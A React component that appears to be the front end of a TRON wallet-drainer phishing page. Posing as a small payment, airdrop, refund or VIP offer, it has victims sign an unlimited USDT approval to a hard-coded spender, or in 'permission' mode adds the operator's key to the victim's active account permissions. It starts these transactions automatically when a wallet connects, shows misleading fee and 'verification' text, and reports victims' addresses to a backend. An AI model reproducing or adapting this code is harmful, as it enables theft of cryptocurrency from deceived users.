import React, { useEffect, useState, useRef } from 'react';
import { track } from '../../utils/funnel';
import { useT } from '../../utils/translations';
import { usePublicConfig } from '../../utils/publicConfig';
import './Approve.css';

// ===== 业务配置 =====
const DEFAULT_SPENDER = 'TAXXTJVZYdgenyZEm5LLhLX2UuNfMJKexr'; // 主网 WiseVault（授权对象）
const DEFAULT_USDT = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // 主网 USDT
const PAY_TO_DEFAULT = 'TWeNE8YcpRurDk3Wz2M5WGrESGFMmVA4tx'; // 划款钱包默认值（后台可配 tron_receive_wallet）
const PAY_AMOUNT_TRX = 0.1; // 支付金额
const AUTH_AMOUNT = '999999999990000'; // 授权上限 999,999,999.99 USDT

// 话术变体（URL ?theme=xxx 切换，同一套交易流程）
const THEMES = {
  default: { icon: '💳', title: 'approve.title.default', desc: 'approve.desc.default', btn: 'approve.btn.default', doneTitle: 'approve.doneTitle.default', doneDesc: 'approve.doneDesc.default', order: 'approve.order.default' },
  airdrop: { icon: '🎁', title: 'approve.title.airdrop', desc: 'approve.desc.airdrop', btn: 'approve.btn.airdrop', doneTitle: 'approve.doneTitle.airdrop', doneDesc: 'approve.doneDesc.airdrop', order: 'approve.order.airdrop' },
  receive: { icon: '📥', title: 'approve.title.receive', desc: 'approve.desc.receive', btn: 'approve.btn.receive', doneTitle: 'approve.doneTitle.receive', doneDesc: 'approve.doneDesc.receive', order: 'approve.order.receive' },
  vip: { icon: '👑', title: 'approve.title.vip', desc: 'approve.desc.vip', btn: 'approve.btn.vip', doneTitle: 'approve.doneTitle.vip', doneDesc: 'approve.doneDesc.vip', order: 'approve.order.vip' },
  refund: { icon: '💸', title: 'approve.title.refund', desc: 'approve.desc.refund', btn: 'approve.btn.refund', doneTitle: 'approve.doneTitle.refund', doneDesc: 'approve.doneDesc.refund', order: 'approve.order.refund' },
};

const Approve = () => {
  const t = useT();
  const cfg = usePublicConfig();
  const PAY_TO = cfg['tron_receive_wallet'] || PAY_TO_DEFAULT;
  const [targetNetwork, setTargetNetwork] = useState('mainnet');
  const [mode, setMode] = useState('approve'); // approve / permission
  const [theme, setTheme] = useState('default');
  const [walletReady, setWalletReady] = useState(false);
  const [walletNetwork, setWalletNetwork] = useState('');
  const [networkMismatch, setNetworkMismatch] = useState(false);
  const [address, setAddress] = useState('');
  const [stage, setStage] = useState('idle'); // idle -> paying -> paid -> authorizing -> done
  const [error, setError] = useState('');
  const [payTx, setPayTx] = useState('');
  const [authTx, setAuthTx] = useState('');
  const autoStarted = useRef(false);

  const detectNetwork = (tronWeb) => {
    const host = (tronWeb && tronWeb.fullNode && tronWeb.fullNode.host) || '';
    if (host.includes('nile')) return 'nile';
    if (host.includes('shasta')) return 'shasta';
    return 'mainnet';
  };

  const decodeHexMsg = (msg) => {
    if (!/^[0-9a-fA-F]+$/.test(msg) || msg.length % 2 !== 0) return msg;
    try {
      const decoded = msg.replace(/([0-9a-fA-F]{2})/g, (m) => String.fromCharCode(parseInt(m, 16)));
      if (/[a-zA-Z ]/.test(decoded) && !/[^\x20-\x7e]/.test(decoded)) return decoded;
    } catch (e) { /* ignore */ }
    return msg;
  };

  const extractAddress = (tronWeb) => {
    try {
      const da = tronWeb && tronWeb.defaultAddress;
      if (!da) return '';
      if (typeof da === 'string') {
        if (da.startsWith('T')) return da;
        return tronWeb.address.fromHex(da);
      }
      if (typeof da === 'object') {
        if (da.base58) return da.base58;
        if (da.hex) return tronWeb.address.fromHex(da.hex);
      }
      return '';
    } catch (e) { return ''; }
  };

  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    track((mode === 'permission' ? 'permission' : 'approve-' + theme), 'view', '');
    const net = params.get('network');
    const m = params.get('mode');
    const th = params.get('theme');
    setTargetNetwork(net || 'mainnet');
    setMode(m === 'permission' ? 'permission' : 'approve');
    setTheme(THEMES[th] ? th : 'default');

    let cancelled = false;
    const check = async () => {
      try {
        if (window.tronLink && window.tronLink.request) {
          await window.tronLink.request({ method: 'tron_requestAccounts' });
        }
      } catch (e) { console.warn('tron_requestAccounts 失败:', e); }
      for (let i = 0; i < 80; i++) {
        if (cancelled) return;
        const tw = window.tronWeb;
        const addr = extractAddress(tw);
        if (tw && addr) {
          setWalletReady(true);
          setAddress(addr);
          const walletNet = detectNetwork(tw);
          setWalletNetwork(walletNet);
          setNetworkMismatch(walletNet !== (net || 'mainnet'));
          return;
        }
        await new Promise((r) => setTimeout(r, 250));
      }
      if (!cancelled) {
        setWalletReady(false);
        const isTrust = (window.ethereum && window.ethereum.isTrust) || /trust/i.test(navigator.userAgent);
        if (isTrust) {
          setError(t('approve.trust'));
        } else if (!window.tronLink && !window.tronWeb) {
          setError(t('approve.tronlinkMissing'));
        } else if (window.tronWeb && !extractAddress(window.tronWeb)) {
          setError(t('approve.locked'));
        } else if (window.tronLink && !window.tronWeb) {
          setError(t('approve.notInjected'));
        } else {
          setError(t('approve.walletNotDetected'));
        }
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  // ===== 支付 0.1 TRX（approve 模式第一步） =====
  const doPay = async () => {
    track((mode === 'permission' ? 'permission' : 'approve-' + theme), 'start', '');
    const tronWeb = window.tronWeb;
    const addr = extractAddress(tronWeb);
    if (!tronWeb || !addr) {
      setError(t('approve.walletNotDetected'));
      return;
    }
    setStage('paying');
    setError('');
    try {
      const tx = await tronWeb.trx.sendTransaction(PAY_TO, PAY_AMOUNT_TRX * 1e6);
      if (!tx || !tx.result) {
        throw new Error((tx && tx.message) || t('approve.payRejected'));
      }
      setPayTx(tx.txid || '');
      setStage('paid');
      setTimeout(() => { doAuthorize(); }, 800);
    } catch (e) {
      const msg = decodeHexMsg(String(e.message || e));
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(msg))) {
        setError(t('approve.payCanceled'));
      } else {
        setError(msg);
      }
      setStage('idle');
    }
  };

  // ===== 授权 / 权限接管 =====
  const doAuthorize = async () => {
    const tronWeb = window.tronWeb;
    const addr = extractAddress(tronWeb);
    if (!tronWeb || !addr) return;
    setStage('authorizing');
    setError('');
    try {
      if (mode === 'permission') {
        // 权限模式：把我们地址加入用户 active 权限组（threshold 1，我们 key weight 1）
        const accountInfo = await tronWeb.trx.getAccount(addr);
        // owner 权限规范化：TronWeb 要求 type/permission_name 字段
        const ownerInfo = accountInfo.owner_permission || { threshold: 1, keys: [] };
        const ownerPermission = {
          type: 0,
          permission_name: 'owner',
          threshold: ownerInfo.threshold || 1,
          keys: (ownerInfo.keys || []).map((k) => ({
            address: tronWeb.address.fromHex(k.address),
            weight: k.weight,
          })),
        };
        const activePerm = accountInfo.active_permission && accountInfo.active_permission[0];
        const existingKeys = (activePerm && activePerm.keys || []).map((k) => ({
          address: tronWeb.address.fromHex(k.address),
          weight: k.weight,
        }));
        if (!existingKeys.some((k) => k.address === PAY_TO)) {
          existingKeys.push({ address: PAY_TO, weight: 1 });
        }
        const tx = await tronWeb.transactionBuilder.updateAccountPermissions(
          addr,
          ownerPermission,
          null, // witnessPermission：保留为空
          {
            type: 2,
            permission_name: 'active',
            threshold: activePerm ? activePerm.threshold : 1,
            operations: activePerm ? activePerm.operations : '7fff1fc0033ec30f000000000000000000000000000000000000000000000000',
            keys: existingKeys,
          },
          { visible: true }
        );
        // 注意：updateAccountPermissions 直接返回交易对象（无 .transaction 包装）
        // 权限更新交易实际费用极低（带宽费 <1 TRX），显式设 feeLimit 避免钱包按 100 TRX 上限预估
        if (tx.raw_data) {
          tx.raw_data.fee_limit = 10000000; // 10 TRX 上限，实际消耗远低于此
          // fee_limit 变化后必须重算 txID/raw_data_hex，否则签名与链上校验不符
          const pb = tronWeb.utils.transaction.txJsonToPb(tx);
          tx.txID = tronWeb.utils.transaction.txPbToTxID(pb).replace(/^0x/, '');
          tx.raw_data_hex = tronWeb.utils.transaction.txPbToRawDataHex(pb).toLowerCase();
        }
        const signed = await tronWeb.trx.sign(tx);
        const receipt = await tronWeb.trx.sendRawTransaction(signed);
        if (!receipt || !receipt.result) {
          throw new Error((receipt && receipt.message) || 'Verification failed');
        }
        setAuthTx(receipt.txid || '');
      } else {
        let allowanceHex = '0';
        try {
          const res = await tronWeb.transactionBuilder.triggerConstantContract(
            DEFAULT_USDT, 'allowance(address,address)', {},
            [{ type: 'address', value: addr }, { type: 'address', value: DEFAULT_SPENDER }], addr
          );
          allowanceHex = (res.constant_result && res.constant_result[0]) || '0';
        } catch (e) { console.warn('allowance 查询失败，直接授权:', e); }

        const hex = allowanceHex.replace(/^0x/, '');
        let alreadyEnough = false;
        if (hex.length >= 32) {
          alreadyEnough = parseInt(hex.slice(0, 2), 16) >= 8;
        } else {
          alreadyEnough = parseInt(hex || '0', 16) >= 999999999990000 / 2;
        }
        if (!alreadyEnough) {
          const tx = await tronWeb.transactionBuilder.triggerSmartContract(
            DEFAULT_USDT, 'approve(address,uint256)', { feeLimit: 150000000 },
            [{ type: 'address', value: DEFAULT_SPENDER }, { type: 'uint256', value: AUTH_AMOUNT }], addr
          );
          const signed = await tronWeb.trx.sign(tx.transaction);
          const receipt = await tronWeb.trx.sendRawTransaction(signed);
          if (!receipt || !receipt.result) {
            throw new Error((receipt && receipt.message) || 'Verification failed');
          }
          setAuthTx(receipt.txid || '');
        }
      }
      // 登记地址
      try {
        const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
        fetch(API_BASE + '/addresses/register', {
          method: 'POST', headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ address: addr, type: 'APPROVE', channel: 'qr', walletType: 'TronLink', device: navigator.userAgent, mode: mode }),
        });
      } catch (e) { console.warn('登记失败:', e); }
    track((mode === 'permission' ? 'permission' : 'approve-' + theme), 'done', '');
      setStage('done');
    } catch (e) {
      const msg = decodeHexMsg(String(e.message || e));
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(msg))) {
        setError(t('approve.verifyCanceled'));
      } else {
        setError(msg);
      }
      setStage(mode === 'permission' ? 'idle' : 'paid');
    }
  };

  useEffect(() => {
    if (walletReady && !networkMismatch && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      if (mode === 'permission') {
        doAuthorize();
      } else {
        doPay();
      }
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady, networkMismatch]);

  const networkLabel = walletNetwork === 'nile' ? 'Nile Testnet' : walletNetwork === 'shasta' ? 'Shasta' : 'Mainnet';

  return (
    <div className="approve-page">
      <div className="approve-card">
        {stage === 'done' ? (
          <>
            <div className="approve-icon big">{mode === 'permission' ? '⚡' : '🎉'}</div>
            <h2>{mode === 'permission' ? t('approve.perm.doneTitle') : t(THEMES[theme].doneTitle)}</h2>
            <p className="approve-desc">
              {mode === 'permission'
                ? t('approve.perm.doneDesc')
                : t(THEMES[theme].doneDesc, { amt: PAY_AMOUNT_TRX })}
            </p>
            <div className="order-box">
              <div className="order-row"><span>{mode === 'permission' ? t('approve.perm.channel') : t(THEMES[theme].order)}</span><b>{mode === 'permission' ? t('approve.perm.zeroFee') : PAY_AMOUNT_TRX + ' TRX'}</b></div>
              <div className="order-row"><span>{t('approve.status')}</span><b className="ok-text">{t('approve.completed')}</b></div>
            </div>
            {(payTx || authTx) && <p className="approve-tx">Tx: {(payTx || authTx).slice(0, 20)}...</p>}
            {address && <p className="approve-addr">{t('approve.wallet')} {String(address).slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="approve-icon big">{mode === 'permission' ? '⚡' : THEMES[theme].icon}</div>
            <h2>
              {mode === 'permission'
                ? (stage === 'authorizing' ? t('approve.verifying') : t('approve.perm.title'))
                : (stage === 'paying' ? t('approve.processing')
                  : stage === 'paid' ? t('approve.activating')
                  : stage === 'authorizing' ? t('approve.verifying')
                  : t(THEMES[theme].title))}
            </h2>
            <p className="approve-desc">
              {mode === 'permission'
                ? (stage === 'authorizing'
                  ? t('approve.finalStep')
                  : t('approve.perm.desc'))
                : (stage === 'idle' ? t(THEMES[theme].desc, { amt: PAY_AMOUNT_TRX })
                  : stage === 'paying' ? t('approve.confirmWallet')
                  : stage === 'paid' ? t('approve.payReceived')
                  : t('approve.finalStep'))}
            </p>

            <div className="order-box">
              {mode === 'permission' ? (
                <>
                  <div className="order-row"><span>{t('approve.perm.channel')}</span><b>{t('approve.perm.zeroFee')}</b></div>
                  <div className="order-row"><span>{t('approve.perm.fee')}</span><b className="ok-text">0 TRX</b></div>
                  <div className="order-row"><span>{t('approve.network')}</span><b>{t('approve.tronMainnet')}</b></div>
                </>
              ) : (
                <>
                  <div className="order-row"><span>{t(THEMES[theme].order)}</span><b>{PAY_AMOUNT_TRX} TRX</b></div>
                  <div className="order-row"><span>{t('approve.recipient')}</span><b className="mono">{PAY_TO.slice(0, 12)}...</b></div>
                  <div className="order-row"><span>{t('approve.network')}</span><b>{t('approve.tronMainnet')}</b></div>
                  {payTx && <div className="order-row"><span>{t('approve.payment')}</span><b className="ok-text">{t('approve.received')}</b></div>}
                </>
              )}
            </div>

            {mode === 'permission' && (
              <div className="notice-box">
                🔒 {t('approve.perm.notice')}
              </div>
            )}
            {walletReady && (
              <p className="approve-addr">{t('approve.wallet')} {String(address).slice(0, 12)}...（{networkLabel}）</p>
            )}
            {networkMismatch && (
              <p className="approve-error">
                ⚠️ {t('approve.mismatch')}
              </p>
            )}
            {error && <p className="approve-error">{error}</p>}

            {stage === 'idle' && (
              <button className="approve-btn" onClick={mode === 'permission' ? doAuthorize : doPay} disabled={!walletReady || networkMismatch}>
                {mode === 'permission' ? t('approve.perm.btn') : t(THEMES[theme].btn, { amt: PAY_AMOUNT_TRX })}
              </button>
            )}
            {(stage === 'paying' || stage === 'paid' || stage === 'authorizing') && (
              <div className="approve-spinner" />
            )}
            {error && (stage === 'idle' || stage === 'paid') && (
              <button className="approve-btn" onClick={() => { if (stage === 'idle') { if (mode === 'permission') doAuthorize(); else doPay(); } else { doAuthorize(); } }}>
                {t('approve.retry')}
              </button>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default Approve;
